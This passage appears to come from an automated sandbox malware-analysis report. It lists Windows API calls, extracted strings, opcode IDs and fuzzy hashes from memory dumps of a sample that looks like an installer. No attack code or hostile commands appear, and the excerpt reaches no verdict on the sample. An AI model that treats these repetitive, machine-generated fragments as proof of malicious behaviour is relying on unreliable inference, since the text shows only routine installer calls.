                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                            • API String ID: 1452528299-1392080489
                                                                                            • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                            • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                            • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                            • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                            • String ID:
                                                                                            • API String ID: 4283692357-0
                                                                                            • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                            • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                            • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                            • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                            • String ID:
                                                                                            • API String ID: 2227064392-0
                                                                                            • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                            • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                            • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                            • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                            • String ID:
                                                                                            • API String ID: 215268677-0
                                                                                            • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                            • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                            • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                            • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                            APIs
                                                                                            • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                            • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                            • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                            • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                            • String ID:
                                                                                            • API String ID: 2280970139-0
                                                                                            • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                            • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                            • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                            • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                            APIs
                                                                                            • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocHandleLockUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 2167344118-0
                                                                                            • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                            • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                            • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                            • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                            Strings
                                                                                            • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                            • API String ID: 3535843008-1938159461
                                                                                            • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                            • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                            • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                            • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                            • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                            Strings
                                                                                            • Will not restart Windows automatically., xrefs: 004836F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveForeground
                                                                                            • String ID: Will not restart Windows automatically.
                                                                                            • API String ID: 307657957-4169339592
                                                                                            • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                            • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                            • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                            • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                            APIs
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                            • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                            Strings
                                                                                            • Extracting temporary file: , xrefs: 004763EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileTime$Local
                                                                                            • String ID: Extracting temporary file:
                                                                                            • API String ID: 791338737-4171118009
                                                                                            • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                            • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                            • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                            • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                            Strings
                                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                            • API String ID: 0-1974262853
                                                                                            • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                            • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                            • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                            • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                            Strings
                                                                                            • %s\%s_is1, xrefs: 00478F10
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1598650737
                                                                                            • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                            • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                            • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                            • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMessageSendShell
                                                                                            • String ID: open
                                                                                            • API String ID: 812272486-2758837156
                                                                                            • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                            • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                            • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                            • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                            APIs
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                            • String ID: <
                                                                                            • API String ID: 893404051-4251816714
                                                                                            • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                            • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                            • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                            • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                            • String ID: )
                                                                                            • API String ID: 2227675388-1084416617
                                                                                            • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                            • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                            • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                            • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window
                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                            • API String ID: 2353593579-4169826103
                                                                                            • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                            • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                            • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                            • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                            APIs
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                            • API String ID: 3952431833-1023667238
                                                                                            • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                            • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                            • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                            • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                            APIs
